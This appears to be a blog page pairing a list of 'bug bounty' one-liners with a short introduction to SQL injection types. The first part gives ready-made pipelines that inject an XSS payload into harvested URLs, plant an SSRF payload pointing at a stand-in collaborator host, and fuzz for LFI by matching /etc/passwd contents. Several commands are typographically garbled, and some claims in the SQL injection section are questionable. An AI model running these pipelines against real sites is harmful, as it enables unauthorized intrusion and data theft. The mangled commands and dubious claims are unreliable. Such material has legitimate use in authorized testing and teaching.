Bug BOunty Helpful Commands

  cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”><script>confirm(1)</script>’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “<script>confirm(1)” && echo “$host 33[0;31mVulnerablen”;done >>. to get urls from websites.... waybackurls target.com | tee urlss.txt dalfox file urlss.txt pipe   XSS   cat file.txt | gf xss | grep ‘source=’ | qsreplace ‘”><script>confirm(1)</script>’ | while read host do ; do curl –silent –path-as-is –insecure “$host” | grep -qs “<script>confirm(1)” && echo “$host 33[0;31mVulnerablen”;done SSRF findomain -t example.com -q | httpx -silent -threads 1000 | gau |  grep “=” | qsreplace http://YOUR.burpcollaborator.net LFI Follow this command to find LFI findomain -t example.com -q |  waybackurls |gf lfi | qsreplace FUZZ | while read url ; do ffuf -u $url -mr “root:x” -w ~/wordlist/LFI.txt ; done find JS files on target.com https:/...

What Is an SQL Injection? And its Types?

 What Is an SQL Injection? 

Now a days, most of the websites you would come across are dynamic, which means that they take the user input and act upon it. When the user supplies an input to the application, it is parsed by the interpreter, where the user-supplied input is combined with the application code. An SQL injection occurs when the user-supplied input or query is considered as a database query; in simple words, the input is not filtered by the application, which means that an attacker could inject malicious code in the application that would be parsed by the interpreter as an SQL statement resulting in an SQL injection flaw. This will then allow an attacker to conduct a wide variety of attacks. SQL, LDAP, and XPath injection all fell down in the “Injection attacks” category which secure the first spot inside the OWASP 2013 Top 10 attacks.



Types of SQL Injection 

The following are the three types of SQL injection attacks:

Union-Based SQL Injection 

This is the most common type of SQL injection. It comes from the class of inband SQL injection, and this type of attack utilizes the use of a UNION statement, which is the combination of two select statements, to extract information from the database. We will discuss this attack in detail later. 

Error-Based SQL Injection

 An error-based SQL injection is the easiest; however, the only problem with this technique is that it works only with MS-SQL Server. In this technique, we cause an application to throw an error to extract the database. Typically, you ask a question to the database, and it returns with an error containing the information you asked for.

 Blind SQL Injection 

The blind SQL injection is the hardest of them all. In this technique, no error messages are received from the database; therefore, we extract the data by asking questions to the database. The blind SQL injection is further divided into two categories:

 1. Boolean-based SQL injection 

2. Time-based SQL injection

 Both of these methods can be used to extract the database by either asking a question or inducing a time delay. We will discuss more about them later.



Comments

Popular posts from this blog

Very Huge Dorks for SQLi || Web Hacking

How to find index of the Array in C